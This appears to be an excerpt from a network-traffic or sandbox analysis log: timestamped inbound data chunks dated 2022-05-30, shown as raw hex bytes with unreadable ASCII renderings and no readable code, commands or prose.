2022-05-30 12:45:08 UTC	17	IN	Data Raw: 57 77 0d 20 c6 3a d2 17 eb ba 78 07 1c 41 a4 76 df 2d 58 45 9a 73 97 66 85 d4 49 51 0a 3a f6 3a cb 9d 74 6d 1f 10 36 25 f9 1c 75 f1 05 e0 6a 18 64 ba b0 ae 4a d5 3e b9 11 2a 0f 99 33 47 88 34 fe 3b 81 dc 28 7e 54 32 9d 43 ff 75 72 48 32 e3 74 6d ec 1b 68 d6 7e 2c d5 e4 d5 e9 36 f1 46 fb 4d 4b af ff 9f 14 5b 77 50 1f 3c 47 38 f6 80 8f da 0d e8 5a 82 37 b3 64 ee 36 10 bb b9 df bb bc 53 67 a5 6e 6f 28 e5 14 12 6e a7 6e 44 fc 16 52 8f 7d 41 94 50 31 12 5e 89 0a d2 30 09 2d e8 98 b1 16 41 2b 62 c3 5d 44 56 60 fa 17 31 c7 6c af b4 80 5c 90 3b bf a8 9e 69 e1 9e 3b 78 8c 5b 26 2a 44 fc ef 0b 40 6b 64 33 01 45 8d 5b e6 cd f3 83 45 2d e3 7c ec dd 17 f1 74 fa 83 e9 22 25 5c 0b ef ed 55 e2 12 50 ad 8f 02 f2 ba fe 72 3e 3f 85 ed ea 7c e3 fd 50 45 15 9f 77 8d 02 f1 21 Data Ascii: Ww :xAv-XEsfIQ::tm6%ujdJ>3G4;(~T2CurH2tmh~,6FMK[wP<G8Z7d6Sgno(nnDR}AP1^0-A+b]DV`1l\;i;x[&D@kd3E[E-\|t"%\UPr>?\|PEw!
2022-05-30 12:45:08 UTC	17	IN	Data Raw: 6d 1c c9 6e 2d 3a 53 fc 00 c4 43 8a 90 24 8d c9 fd 84 46 e0 16 3e a8 f6 37 b0 25 09 af af 2a 6a b4 3d b3 14 51 30 da 1c 4e d5 a6 f4 7e 38 27 98 eb d9 ca b1 ae 2c 4a 66 e2 fd c5 7c e8 ef 99 67 b2 bd 97 72 8c 01 b1 8f 0a 0f 34 88 ed 68 b3 04 bd b6 2a ab 4a 08 ba 2c fc 9b e1 2b e8 58 68 f0 d8 26 20 e8 a4 97 b7 72 f3 25 f7 16 99 30 2f 6e e8 a3 f5 b9 77 ff 85 6d c4 d5 87 e6 a0 e0 00 18 f5 07 e2 7a 42 eb 5d c1 4a 75 87 7e ee 09 4f 6a 21 bf 0c dd 5d d6 00 2d 8b 8e f3 a8 36 fc c6 5b bc 86 17 57 13 c3 03 51 b8 21 8b 3e 2c 03 ed 39 21 50 3f 0f f5 61 1f c8 a4 bf 77 84 10 0f 40 41 14 3d 40 c2 5f 3d a1 06 bc 0a 05 1f d4 d1 51 40 90 02 77 e8 a7 49 c9 fc 89 e5 c7 91 b0 a8 e2 23 d9 cf 62 d2 d1 7d 5c f7 2d 77 03 08 7e da 15 fb ad 1a 1e f8 23 65 6b fb 7a 6b 6f 53 3f ff 6a Data Ascii: mn-:SC$F>7%j=Q0N~8',Jf\|gr4hJ,+Xh& r%0/nwmzB]Ju~Oj!]-6[WQ!>,9!P?aw@A=@_=Q@wI#b}\-w~#ekzkoS?j
2022-05-30 12:45:08 UTC	19	IN	Data Raw: cc cd 44 17 0b 80 e9 2a 1f 19 2d 8a d3 f0 63 28 98 65 1c a6 cf 81 67 67 69 67 4c 06 29 60 a9 bc f2 07 72 c9 8d 2a f9 b5 83 d2 89 3d 23 46 df a5 09 95 14 5a a2 61 76 9d 0c 7f f2 d0 91 18 f9 2c 9b 47 15 6b 2f ae 4e 26 20 c0 66 d5 c9 0f 42 ef 69 0d 86 a8 3c 36 8d 49 64 10 29 38 5a 02 6d 92 11 21 1a 3c d7 1b 36 d3 81 7f 2c a1 b2 d9 b1 62 9e b2 2e c5 99 fe 40 97 c2 9b 2e df f1 da 2a e7 02 b7 f2 18 9b 1f dc 3a 2e 07 ef 9d ed f9 75 f0 31 0f 94 da 73 1a 7c 41 4a 2a 57 a1 74 26 a4 36 24 b4 92 95 c3 a8 45 85 fe 50 0b 64 9b 99 d1 f2 a5 9d a9 fb 2a 6d 57 9d 77 c1 8c 3c 5f 0b d5 d0 1a 8e 25 8b 8e 90 06 9c b8 71 6a b3 da 63 6d 72 3e 3d cc 37 1c bb 17 a5 7d 14 fd 48 ee b4 dc 36 06 a9 00 73 4a e5 b9 cd 78 ee 8b 24 66 02 8f 97 89 88 a4 d1 11 62 e0 c0 af 45 49 19 40 2a 86 Data Ascii: D-c(eggigL)`r=#FZav,Gk/N& fBi<6Id)8Zm!<6,b.@.:.u1s\|AJWt&6$EPdmWw<_%qjcmr>=7}H6sJx$fbEI@
2022-05-30 12:45:08 UTC	20	IN	Data Raw: b2 ce 7f 8b 95 ca c7 26 71 a4 23 ae b3 56 e4 6d b1 c3 cd 0e bd bf b8 ce 44 de 50 2f b3 04 ac 65 db f8 ca 1b 5e f7 82 55 1a 15 35 96 7e ed 36 14 1c e6 5a 96 de 52 61 e3 15 81 f9 74 35 3c 9e 23 61 e2 2a 99 3d ad 86 de 64 61 3b d5 43 66 3e fa 15 8a 50 12 9b 31 5d 2a c2 2b 5b 6e 33 9b f3 79 a3 c8 bd f7 d8 0e af 7d 84 09 03 3f 88 04 86 77 53 a0 30 35 4a 1e 32 d4 5b 01 98 4d 28 65 91 c4 bc 50 83 dc 07 a2 b0 32 16 06 3b b5 ae 5f 6e d0 6f df f8 81 5d 4d 78 bc df 1d c0 ad 91 27 25 30 4e 6a b5 11 48 dd b4 2b 23 38 61 36 b5 f2 ee 4f 3f 92 0c 1d 31 46 89 fc 02 3e f8 0a d0 2e d9 27 f1 3f 39 5d 5e ba 1a e4 18 d6 9b ac 6b 3a 94 08 2b 29 62 e5 98 7e df 38 33 d2 57 c3 5a 07 f2 13 07 f2 9f 32 91 e7 5f 37 c8 b1 2c 93 28 fe dc 0a 4f ee 85 3d e4 7d 1b e4 63 2a 18 81 12 e0 cf Data Ascii: &q#VmDP/e^U5~6ZRat5<#a=da;Cf>P1]+[n3y}?wS05J2[M(eP2;_no]Mx'%0NjH+#8a6O?1F>.'?9]^k:+)b~83WZ2_7,(O=}c*
2022-05-30 12:45:08 UTC	21	IN	Data Raw: 21 96 eb 66 c8 88 0c a8 3f fb 64 b3 8f 72 de 0a 02 30 cf fe c2 fe 40 7e ab 0e f6 d7 0f 8b b1 54 33 03 10 a2 9a 03 c4 08 62 d6 d3 28 c7 b8 b4 8c 68 60 01 06 a9 c8 9d 1c 3e a4 7e 01 1f 89 02 84 d6 eb 9f 21 48 29 6a 62 a2 c8 df ac c7 36 3b a5 06 b2 3d 5f 72 ba 72 b5 9e 8a 01 dd d2 1b 6d 7d 62 d3 93 14 f4 38 55 ac 36 26 5c 8e ba 8d 47 28 60 f2 1b 6b fa c7 cc 27 ca 77 e6 0b 61 03 00 50 c3 f0 4f b8 ca 42 06 9d 33 28 6a f8 28 3f 8c cf 54 b2 52 c9 8e ce 06 bf 29 a3 3c 39 c8 b2 ef 88 a6 e0 ab 56 87 ba e1 e7 ec fe 37 e9 49 2a 59 59 19 67 06 01 e0 f0 9c 3c 7c 11 3c 3a 20 e0 e9 9a e9 ed 9c a6 79 67 69 c2 42 b8 90 6e 5a cc 44 80 07 78 4f 18 22 6b 86 ab 8b 90 83 24 29 45 07 e5 e2 86 b6 c0 8b f4 03 f3 aa 2b b2 6f bb f7 7a a3 37 42 ab fc 75 25 42 db f7 17 fe 1f ab 35 2a Data Ascii: !f?dr0@~T3b(h`>~!H)jb6;=_rrm}b8U6&\G(`k'waPOB3(j(?TR)<9V7IYYg<\|<: ygiBnZDxO"k$)E+oz7Bu%B5
2022-05-30 12:45:08 UTC	22	IN	Data Raw: 6b b1 a6 a7 ca c7 3e a6 55 1f fa fb 10 05 b4 3d 49 3c c0 6d da 21 8b a9 13 aa bb 92 2a 93 63 36 3c c0 a8 da de 0a 32 17 e4 8d f1 c4 d4 31 1d 5a 16 5a e2 58 55 35 ed 18 07 3c 4f 3d 09 aa f5 b7 72 f1 8a 23 c7 84 10 7a cc 50 43 8a 7b 63 7b e0 01 30 2c 1d 51 05 5f 98 b3 ae ee 19 0b df 3f df 87 25 bc ad d3 75 bc 58 f0 c8 12 fd ad 78 e7 d3 85 f9 b3 e1 e8 a8 60 07 b5 37 73 b6 9e 12 d9 32 c1 09 90 ec a7 22 bf a4 77 e9 13 93 29 cb bc 13 13 b0 c6 59 d1 0f a0 1f 16 39 42 29 93 22 10 ff ec 5d 0c 55 86 1b 1b 06 ff 89 c0 4f 0b 76 cd 16 26 c1 66 88 94 9c d2 5a d9 8b 2e 16 70 83 f6 37 5b f0 0a 8a 24 67 fe 6c cf 98 03 c8 cf e2 b3 95 44 3f 55 da e2 20 6b 16 77 ca d0 36 7a e7 05 f8 74 5e f6 71 04 df 3a 2b 12 6a 8d 2b bb 4e bf 0d e7 17 89 7e b8 4c fb 35 be 2a 8f b3 c3 cd 54 Data Ascii: k>U=I<m!c6<21ZZXU5<O=r#zPC{c{0,Q_?%uXx`7s2"w)Y9B)"]UOv&fZ.p7[$glD?U kw6zt^q:+j+N~L5T
2022-05-30 12:45:08 UTC	24	IN	Data Raw: fa 96 42 49 80 af 30 af ff ca b3 80 9a ac 16 0c 36 14 a9 42 02 d0 09 13 6f b8 57 be ba 28 59 39 f3 d9 35 11 f8 49 fb 60 6c aa 1a ec 1c 27 18 20 9e 12 29 b9 06 8f ba d7 39 f1 95 af 8f fa db 9b 65 9a 79 43 e1 ac e1 a5 a1 0c 81 60 cf 36 b2 1d 2c 41 31 7c 4f 65 d0 90 d1 21 33 3f 18 91 63 4a ee 22 0e 48 23 ca 16 1e 01 a2 98 16 6a 33 66 8a 28 62 d2 4e 79 77 d9 c6 65 b4 81 11 4f 18 32 4c 9d 76 f9 3f 96 97 53 22 86 eb e4 96 51 f1 d6 ad 52 f0 5c 1f 20 b8 1e bc ef 10 12 a7 ae f1 f2 f3 95 4f 49 01 3b 02 ef c4 75 6e c4 5b 57 16 d5 46 37 e3 43 8f 12 ae e6 25 89 8e 14 cd df fc 5a 5c 4a 29 ac 7f 42 3f 92 43 54 6e d8 65 01 1a ba 83 a6 2f 9e da 77 c8 b2 67 2f fe 69 1b cb 61 98 46 f6 3c 58 cf 17 41 82 f8 7c 92 6f c4 80 24 58 ef 0a 32 d3 59 ea ea f8 b9 7f f0 b6 9a 7a b4 9a Data Ascii: BI06BoW(Y95I`l' )9eyC`6,A1\|Oe!3?cJ"H#j3f(bNyweO2Lv?S"QR\ OI;un[WF7C%Z\J)B?CTne/wg/iaF<XA\|o$X2Yz
2022-05-30 12:45:08 UTC	25	IN	Data Raw: 5b 03 3b 8c 4e f5 73 2b 2e 0b 3f e1 62 db 29 13 a1 a9 2b 4d 50 f7 ae c1 22 c2 4c 7b d5 a4 aa d5 eb 8d 71 da f3 3e 28 0b 5b f7 73 b8 d7 97 eb 15 f8 a0 94 10 aa 74 e9 49 80 7e 31 f0 b7 33 16 c6 de ed 6a 71 f9 10 56 73 8a 64 1b 4c 5e 08 2f 2c f8 03 75 dd 68 3f a4 7c 82 57 5e bc e7 5d 80 c1 27 65 f8 16 b7 5b 00 de 16 3d 26 d4 61 fa 2c d3 92 44 47 9c 6c 15 d0 3c 3e 20 b3 8c d6 fb bd ca a8 94 98 12 51 c9 27 4b e6 0b 47 ba e5 6c 8f 5d f0 b9 2c 5d 74 02 dc a7 8f 05 4e 5f c4 9e 1b e9 ef 63 44 d5 9d 86 3f 35 83 83 32 9f 61 cc 42 f8 29 5a a6 fd d7 75 33 15 b7 d7 15 f5 43 94 98 07 26 12 42 0d 58 6f b6 f4 7b 74 19 df f3 82 27 ab 5e 57 86 2c 56 75 89 db 96 29 c0 fd c0 a4 95 51 5b 2e b9 49 80 8e 13 72 8b 0a bf c2 52 8f f9 04 a1 e4 70 ca c7 b1 8d 4a 38 48 ba 87 75 5e 8a Data Ascii: [;Ns+.?b)+MP"L{q>([stI~13jqVsdL^/,uh?\|W^]'e[=&a,DGl<> Q'KGl],]tN_cD?52aB)Zu3C&BXo{t'^W,Vu)Q[.IrRpJ8Hu^
2022-05-30 12:45:08 UTC	26	IN	Data Raw: 2c 64 a6 ef e4 b2 fa 27 4e 7b ea 4f 94 da 64 26 e7 ae 4a 0e fe fc 74 c6 57 0d 24 c0 14 46 4c 50 15 38 40 03 a7 cd 9c 7a 68 ee 68 6c 9b 1e f7 7c bf 78 b4 81 8c 3c a1 cb b6 82 bc d9 cd 34 ad 77 93 15 e3 16 bc 03 63 03 e0 ad f5 39 3b ba 14 02 e8 1b 3d 37 d1 48 df aa 24 d5 ef 00 46 99 7b 8f 39 76 52 7b 6e db f1 ae 5e a5 ac b1 dd 54 0f 5a 78 ba 7b bb c2 54 09 0a 73 f6 9d 63 c8 e5 37 c5 bb 9a 1b c5 0c 2c da fb e8 33 77 4c 59 91 5f 48 c4 bb 60 6c 40 61 3d af 8a c7 b7 79 45 47 3a f2 62 b4 bf 76 c9 12 80 a8 24 16 a6 55 73 f3 08 0b 3b 30 ed 8f d3 a7 cd de fa 2b 4c ee 42 13 2f c3 5b 38 8f f3 24 1e f8 70 f0 ed 0f 99 c1 c0 5f 83 9a a7 c4 e4 6b 49 fd e3 4c 0c b8 59 1d 18 49 3e 86 15 a3 24 f5 11 98 0e 73 fc bd 7b 9a b1 16 a2 ad fb 60 c4 36 49 57 e6 b2 93 c7 f6 fa 25 e3 Data Ascii: ,d'N{Od&JtW$FLP8@zhhl\|x<4wc9;=7H$F{9vR{n^TZx{Tsc7,3wLY_H`l@a=yEG:bv$Us;0+LB/[8$p_kILYI>$s{`6IW%
2022-05-30 12:45:08 UTC	28	IN	Data Raw: 1e 3a 34 f6 df 9a 39 38 e3 7a 77 ba 99 7c 82 39 5c 07 06 6b 7b d1 aa 7f 8f f0 a7 a9 3e df a0 18 26 17 dd 52 eb 96 2c 02 22 4e b4 ff 1a d2 93 8c 4a 3c 77 da fc 00 37 5a d3 4a 89 fb 39 5d b4 8b 07 96 9b 5f 9a 49 4c c4 6b 04 f9 fe 22 75 6c 7c df 3c b9 1e 3f 8e 18 65 9e ab f0 f2 be 1e d6 3b e6 4f bc 41 e2 fd 4a 00 23 25 32 2a 53 e1 90 bb f7 71 a4 c2 08 89 d5 1f 30 20 cf 9c 03 36 4a 66 5b b7 22 c1 fa 07 b3 13 e1 cd 84 4a 7c 59 17 51 45 e9 37 a5 ff 75 e4 d6 12 4c cf b6 7f 38 6b e9 84 f5 50 3b 7b ab 0d e6 40 a4 e4 26 df b5 e1 f1 4f 02 65 aa 12 32 7f fa e7 7f 69 8c b1 46 c1 8b 36 fd 92 c2 7a 68 f9 f8 d8 97 75 e4 0c b1 d3 db 3a d8 90 84 61 ce 4b 62 c9 24 87 51 ca 9b fb 60 5c 24 46 ed 01 b7 f2 f1 75 74 d3 35 b8 ec 6f 7c 91 e8 8b 8b 91 c9 1d 14 8c ed b6 50 ba da 10 Data Ascii: :498zw\|9\k{>&R,"NJ<w7ZJ9]_ILk"ul\|<?e;OAJ#%2*Sq0 6Jf["J\|YQE7uL8kP;{@&Oe2iF6zhu:aKb$Q`\$Fut5o\|P
2022-05-30 12:45:08 UTC	29	IN	Data Raw: 6d 16 f8 5a d1 51 54 90 00 77 e8 06 1b c9 fc 07 6e b3 01 c6 57 e7 23 a5 80 9a d4 4b a6 18 83 6e 12 ff c8 d1 cd 9e f8 d9 2b 44 b6 a3 06 01 f7 6b 57 93 6b 65 56 6b 99 ab d2 94 df 06 64 20 03 67 9b 1d ed 46 90 1f ee 33 bb 80 07 78 3f 18 34 0d 86 ab 8b 90 83 14 29 bf 60 e5 e2 30 ce 9f 00 11 34 31 2f 67 15 93 6b 0e ad 78 cc c9 30 41 9a 1a 4c a9 38 df f2 c3 e4 03 96 86 f6 77 fb b4 91 28 be 7c 47 de d0 c0 c4 67 7a f2 f0 94 70 31 56 be 4f 42 7a 66 ad 59 4b 5b 3a 9e a1 16 14 e7 bd f6 1d dd 7e 13 ba 0a 81 40 4f 1e 2b 90 e4 dc d6 46 35 b3 86 9a 78 06 f3 c9 c7 c8 16 85 10 2b 69 b9 cc 64 f5 f3 d9 8b 97 4a 6b a2 06 7a f0 ee e8 84 25 e5 9e 3a 77 8b 43 66 05 d3 ae 5c 6b 12 7f 4d 2c e5 4e d2 fb 50 80 e4 36 ca fc 4e 05 4e 4f 6c 9a 85 25 96 ea f7 50 0c 86 aa 9f c2 2e 98 00 Data Ascii: mZQTwnW#Kn+DkWkeVkd gF3x?4)`041/gkx0AL8w(\|Ggzp1VOBzfYK[:~@O+F5x+idJkz%:wCf\kM,NP6NNOl%P.
2022-05-30 12:45:08 UTC	30	IN	Data Raw: bc a4 05 fa 63 95 2a 7f d1 8a 6e f4 fd 4e 2e b5 ab c0 e7 9a 85 64 6c fa 2e bd dd 7b 04 49 17 e5 3f e3 96 55 6e 07 4c 53 fc 6a 27 bd ff 85 d8 15 5e c0 d7 cd 2e 96 6b d8 4f c8 3e 24 c9 db cc cf dd 5e 44 db 6e e2 ce e2 b3 f6 d2 80 1e f1 f9 a6 94 e5 d7 3a 41 8d 39 a2 05 87 3f de b5 69 64 57 6b f2 d1 7e 25 69 08 cb c0 30 f3 08 71 36 ec 24 04 36 fa 66 23 60 81 cd 8f 2b 68 d2 3c 29 ed 7f 6e cc e2 ab 7f fe d7 27 ee 78 a8 7c fb dc f7 a1 28 c0 b6 02 9f d8 e8 4c be cb 5e 10 ec cd 3d 91 45 8e 35 bc 1b 30 91 a8 38 9a b1 16 78 6d e2 90 0a 18 49 16 72 2f 80 cf 2b 08 41 de 96 d7 01 22 fd ce c8 4c bc 78 3d 14 7d e3 32 6c 36 24 82 23 cf 22 50 50 5b f5 61 17 68 98 10 b8 ca 7e e2 13 61 87 d2 af 3c 23 2e ec 65 a2 63 bf 2c 87 7d c1 62 1b cc ad cb 89 30 c8 fc 75 a1 53 31 a3 3d Data Ascii: c*nN.dl.{I?UnLSj'^.kO>$^Dn:A9?idWk~%i0q6$6f#`+h<)n'x\|(L^=E508xmIr/+A"Lx=}2l6$#"PP[ah~a<#.ec,}b0uS1=
2022-05-30 12:45:08 UTC	31	IN	Data Raw: 01 fe 22 d2 6b 7c d2 79 13 a1 12 78 e5 89 84 aa 58 3f 88 98 11 1a b2 78 86 34 95 6d a2 2b 8f 84 c1 cb 00 b5 17 66 f8 e9 2a ae c9 d6 ff f7 7f 2c d6 fd 2d 38 f6 27 31 0f 9c 96 3d 90 2a 19 38 31 85 de cc ba c2 41 d9 13 c8 32 58 47 b9 94 38 f1 06 58 ad f3 ef 00 9f 89 b6 7f b0 18 45 5d b9 26 80 dc 6b 9e 2f e0 c0 ad 62 fb 9d d2 9d 99 eb bd 9b b9 e9 ee 8d 31 31 95 49 e6 63 d5 44 be c6 53 b4 f3 27 08 4a 7c bc ce 56 4e 95 cb 84 56 cd 03 86 61 14 f6 50 39 d4 39 61 41 6b f1 d2 5e 6f 3d 68 26 83 7b 06 bf 25 89 4e f5 bb 2d 39 12 83 4a 8b 91 4e 1e 14 8c 3d d5 15 91 62 23 3a d8 0a 67 99 8d 6a ab de 91 fa 00 d0 f0 7c 57 b6 e6 13 ac fe d1 18 06 8e af 76 9b fc c7 d6 5b 68 d5 e4 dd 71 0a 54 41 93 f1 6f f9 17 eb 0e f4 e0 ff b9 5e 67 4c 4d f7 23 0b 89 33 e1 95 f6 9e 49 65 23 Data Ascii: "k\|yxX?x4m+f,-8'1=81A2XG8XE]&k/b11IcDS'J\|VNVaP99aAk^o=h&{%N-9JN=b#:gj\|Wv[hqTAo^gLM#3Ie#
2022-05-30 12:45:08 UTC	33	IN	Data Raw: fd 89 41 d0 80 60 1d a3 61 e7 0f cd 33 b1 bc 74 71 58 f3 91 c9 1a f2 62 61 17 64 8b d7 00 f2 f1 7d 66 08 79 ff c7 6f a0 e7 07 56 a8 61 5b d4 11 cc 15 c3 64 77 6e 8c d0 60 73 74 6c 5a f1 a8 e4 fd db 9b 06 2f ef 0c 2a 53 9f f1 9b f6 58 ed 36 ed 76 c2 16 1b 1a 4d dd e3 ea b8 60 b9 c6 6f 5d 42 52 0c eb 40 c2 a5 d7 9b cc a8 a6 ef 9d c7 3a 56 07 39 f5 de c9 de a5 5e 55 93 aa 1b 17 8b f3 70 15 7c d8 0c 27 d6 36 a1 ff 13 5b 61 9f 1a 98 60 d8 5b 03 71 71 dd 46 a0 81 b2 de 04 e0 0d b8 41 16 db 2e e4 88 d6 bd 3a af 16 8b 89 c9 85 a6 c6 87 aa 3a a7 5d eb 15 97 9b 12 f9 5b 59 61 12 73 6f 56 5e 15 53 f5 34 30 7c 65 29 75 19 43 66 cb ff 45 d1 b1 4e 57 78 37 f4 f3 79 65 20 a4 60 bc 5e f1 bc d6 74 c5 ce 60 e6 02 40 ae 35 b0 d0 75 76 40 c7 1a 84 15 e2 df 47 e1 66 c0 ec d2 Data Ascii: A`a3tqXbad}fyoVa[dwn`stlZ/*SX6vM`o]BR@:V9^Up\|'6[a`[qqFA.::][YasoV^S40\|e)uCfENWx7ye `^t`@5uv@Gf
2022-05-30 12:45:08 UTC	33	IN	Data Raw: f6 7c da e9 65 ad 04 90 70 e7 65 92 ac 7a 6b 35 19 b1 70 c5 df 4c e9 94 7d 11 63 72 b1 34 fe 6f 6b 89 87 93 b7 d4 cf c1 c6 19 7f a0 da de 83 ab f9 5f 4b 14 4a 8e 59 5f 89 89 00 c3 fa ee a1 ba 69 c3 d8 82 83 74 9a 47 46 56 3f ec fb ad b3 56 bb 5b 3a dd 6e 53 f3 42 f8 61 5b 20 6c 5a 7f 15 fb de 76 d2 c4 67 9d 76 55 25 ab e6 8d c3 2a 6e 36 66 ad 3a c3 14 0d 89 e8 59 d1 b7 b3 bf 79 cb 61 ef 52 dc 4e bf 3d d9 f7 0d 49 20 35 34 47 44 b1 8d f4 5a 86 93 68 ba d1 51 81 86 99 3f be 16 04 40 02 6c 97 47 7d a2 06 d5 38 04 be 39 50 68 5e a6 bb 7d ed 76 71 5e 82 f5 b2 ed 0d 83 c4 5d 60 47 86 af 94 17 36 00 4a b1 fa 9d 48 86 c9 43 f7 96 6f 37 b5 08 a0 b2 90 da 6b e0 3c d1 aa 47 9a bd 0b 41 92 b2 b7 ca 93 65 af 5c 15 01 a2 8f 24 ec c0 ce 51 9a db ae 38 9e 88 cd f8 0a d0 Data Ascii: \|epezk5pL}cr4ok_KJY_itGFV?V[:nSBa[ lZvgvU%*n6f:YyaRN=I 54GDZhQ?@lG}89Ph^}vq^]`G6JHCo7k<GAe\$Q8
2022-05-30 12:45:08 UTC	35	IN	Data Raw: 50 75 05 a3 ef fa 54 62 20 71 7c 78 d9 50 ba c2 52 0d 5a be ed a5 95 c8 b3 61 14 b3 51 c8 6c b4 d6 56 eb ae 65 96 0c a2 42 7f 0a 0c fe 1f c4 ed 52 cd 95 62 8a a2 05 07 89 f2 97 09 64 57 64 88 dd f2 60 9d ae a6 b0 cd 0c f7 27 d1 ee b3 04 36 c1 fe f9 b1 98 93 89 4b 4d ec 92 55 7c 93 e7 0d 2d 54 d9 fe 91 b2 11 2d 91 83 e8 17 ba d0 52 cd 47 74 25 74 e8 bb a9 c8 5e c2 bd c3 b8 ed 6e 02 65 2d d8 7f 1c d0 93 8d 89 46 f5 20 f5 34 1c c5 3d 19 73 21 14 cf 2d 53 65 0d fa de 01 a1 a2 bb dc 2f 20 f4 9f 14 f6 44 d2 9c 41 e8 0f 66 7c 36 9c df b5 c8 96 94 6c 9b 9b 74 47 b0 8e 67 8d 7e 15 d9 31 48 56 f4 ee 6e 65 fa 6d d3 5d b7 60 1b 24 e4 9e 9e 52 fa eb f2 22 97 79 a5 78 f5 a6 5a 0b 6e 72 17 43 d1 d0 b2 5e 70 bd 69 49 16 3c 26 5f 51 19 7b 72 ff f7 cc 94 6c 94 b7 fd f8 24 Data Ascii: PuTb q\|xPRZaQlVeBRbdWd`'6KMU\|-T-RGt%t^ne-F 4=s!-Se/ DAf\|6ltGg~1HVnem]`$R"yxZnrC^piI<&_Q{rl$
2022-05-30 12:45:08 UTC	36	IN	Data Raw: 71 2d 00 23 de 5b 05 ae 6c 4a 01 08 71 a5 5e 98 7c 84 59 30 b6 e0 7b 81 31 c7 ea fc 12 7e 15 bc 8c 83 3d 3d 3d 5a 4a f6 1c 5b 1b 18 e1 8e 5a 73 27 f9 ad fb d8 89 35 1c c5 48 1e ed a7 ae b1 ca c4 f9 73 49 c5 cc ad 13 e5 82 24 ef 15 42 a9 5d 1e b4 b6 2b 82 83 c2 aa ac d9 b0 56 e5 1f 87 11 27 05 93 c0 67 1d 20 f5 08 63 07 f8 31 7c 74 60 4d a5 8e 8b 48 f5 e2 5d 64 87 d0 f1 ce 9f de 1a b7 73 9e 87 74 dc b1 b3 ba 39 2b 9f 82 ae b4 14 1f 1f 95 4d fe 58 51 b5 0e 9b fb 04 d1 b8 fa 1b b7 10 ef 15 31 01 f4 60 35 1c 16 d5 9f e8 da 3a 3c dd a3 ea 79 fa 90 2c 5e a7 85 2a 90 93 75 bb 19 32 48 38 e4 34 ff 5c 3b 5b 77 10 cf cb 21 b3 53 c1 ec 3b 15 a3 33 82 bc 1c 80 8d 89 a3 6c 10 3c d5 13 b4 04 49 76 32 41 91 24 1a 6a 57 58 fc d1 af d9 c9 76 29 0f 84 fc c2 87 9e a3 7a 9f Data Ascii: q-#[lJq^\|Y0{1~===ZJ[Zs'5HsI$B]+V'g c1\|t`MH]dst9+MXQ1`5:<y,^*u2H84\;[w!S;3l<Iv2A$jWXv)z
2022-05-30 12:45:08 UTC	37	IN	Data Raw: 96 53 37 5b 87 be c7 24 57 dc 51 e3 a9 ae af a9 0d 28 05 14 07 4a 98 89 9b 4f f5 7f dd b3 c8 72 8c 6b 67 63 a3 82 ab 18 e6 c8 9a e4 57 c9 12 1f da 10 95 2e 26 8d 48 a0 18 c1 b9 40 3c c1 4e e1 81 0e 1d 00 56 0f d5 87 04 e6 5d 32 b9 a2 6e 03 b2 0c 65 c2 13 d1 50 81 ad 35 07 e3 9c 78 bf 70 d7 5b af b2 5d a9 c2 1a 53 8a c6 e3 21 1f 1c 79 2a 4f a5 37 dd ae 02 49 12 7f 4d 2c e5 d7 59 05 af e8 04 c6 d6 83 e1 12 1c 05 86 39 4a 2c b2 1f df 88 a2 a2 b2 13 93 f6 98 00 5b 58 7f e3 f1 a7 a9 4a 04 fc 77 86 e8 c9 fd 82 ca 4e 21 62 c3 7b 15 80 87 fa 0a 28 74 9f e0 cf 19 37 f5 af 0f 7e 77 7f d0 f9 22 7b 5a d2 b7 8c 91 af b0 44 dc 3e 36 b5 79 d9 5e cc df e1 4e b2 4d 50 a9 b0 6a 59 86 46 5a a5 a6 48 6c 7e 56 3b cb f9 db f4 bb 30 47 b9 b6 5f b2 d3 bc 00 fb e2 9e e3 25 23 c7 Data Ascii: S7[$WQ(JOrkgcW.&H@<NV]2neP5xp[]S!y*O7IM,Y9J,[XJwN!b{(t7~w"{ZD>6y^NMPjYFZHl~V;0G_%#
2022-05-30 12:45:08 UTC	38	IN	Data Raw: f6 70 b1 73 9d 81 b2 d9 69 e5 3e bc cd 05 f1 63 5c 0c 32 fd 2d fc 37 4e 50 2d 97 0f db 6a 5f ab f2 ea 6a d7 11 90 60 b9 48 b1 2c 45 41 d6 02 9f d1 8b d6 22 06 b6 87 28 b7 02 bc 8d 51 57 a8 51 fb 14 38 ac dc b1 b9 78 6d ae 90 b9 47 49 16 af ef 6d 2c 90 c6 61 2e 75 58 91 22 a4 43 0e 24 d9 85 7b 66 cf b0 8e 1c ed 3a 49 66 1f cb 25 28 14 53 15 44 0f 4e 73 fa da c4 3d 1a e3 1e 6d cf e8 e6 c2 1c c7 d7 11 05 6d 9a 45 9d 25 95 33 d8 8d 2c 45 de 3a 04 dd 68 92 05 fd 50 34 b2 24 e0 a6 e0 01 c4 cb b4 19 23 ec 81 25 9d f0 9c 84 cf 7b 73 dd 27 6d 18 6b 93 cd 56 67 83 40 67 47 d2 37 02 24 00 03 c7 48 da 2c 2b bb 45 d0 20 c5 e1 87 58 5f f0 64 33 88 d9 8b e4 58 f3 3e 28 d4 f2 11 6c 17 64 8d 9c 66 ce 5d d4 d9 cd 35 8b e1 d6 be cf c0 56 dc 51 5b 8b 0d cc 15 c5 66 33 96 76 Data Ascii: psi>c\2-7NP-j_j`H,EA"(QWQ8xmGIm,a.uX"C${f:If%(SDNs=mmE%3,E:hP4$#%{s'mkVg@gG7$H,+E X_d3X>(ldf]5VQ[f3v
2022-05-30 12:45:08 UTC	40	IN	Data Raw: 4f 6c a7 c2 27 34 86 b9 1f ea bd 43 bb 9a c1 6d 48 b2 d2 91 f9 14 3e 26 26 bf d7 c2 93 ad 44 8f 0c 8c 7b 99 36 59 7e 64 41 ce c5 09 2d 69 b1 eb 4d 12 e2 aa 49 77 60 03 fc bb c2 1c 02 3c 3e 22 73 e4 56 4e 1f 87 df 7c 12 06 07 c8 31 33 f7 51 38 91 a7 69 eb 14 07 f0 11 50 5b 42 14 d7 ad c3 01 b8 c1 10 00 9f db de d4 99 7b 75 e2 84 29 5c 22 3a d5 ca 1c 72 57 ef c2 00 ea 62 ed 5a 35 48 1d 5b 72 d8 88 24 ac 88 af 01 e7 98 c5 05 2c 72 44 bf 52 a5 45 1d dd 3d a7 f7 78 b7 ff be 84 2f 84 70 0a 9f 1d 9b 4a cb 71 aa f7 1c 53 5c b7 53 81 d1 1b fa 0d 79 4f 9b e9 3e 16 e5 fa f6 37 58 82 78 00 c8 67 d6 44 12 dd 1a f9 b3 63 06 a6 f0 0c b4 25 a8 a5 94 ed 5a dd 92 62 ac 2b fa f8 81 d6 67 a2 31 bf ef bb 05 ae cd 69 fe c5 42 25 e8 f7 61 39 e5 fe ec de 47 86 74 8e 44 21 1a 25 Data Ascii: 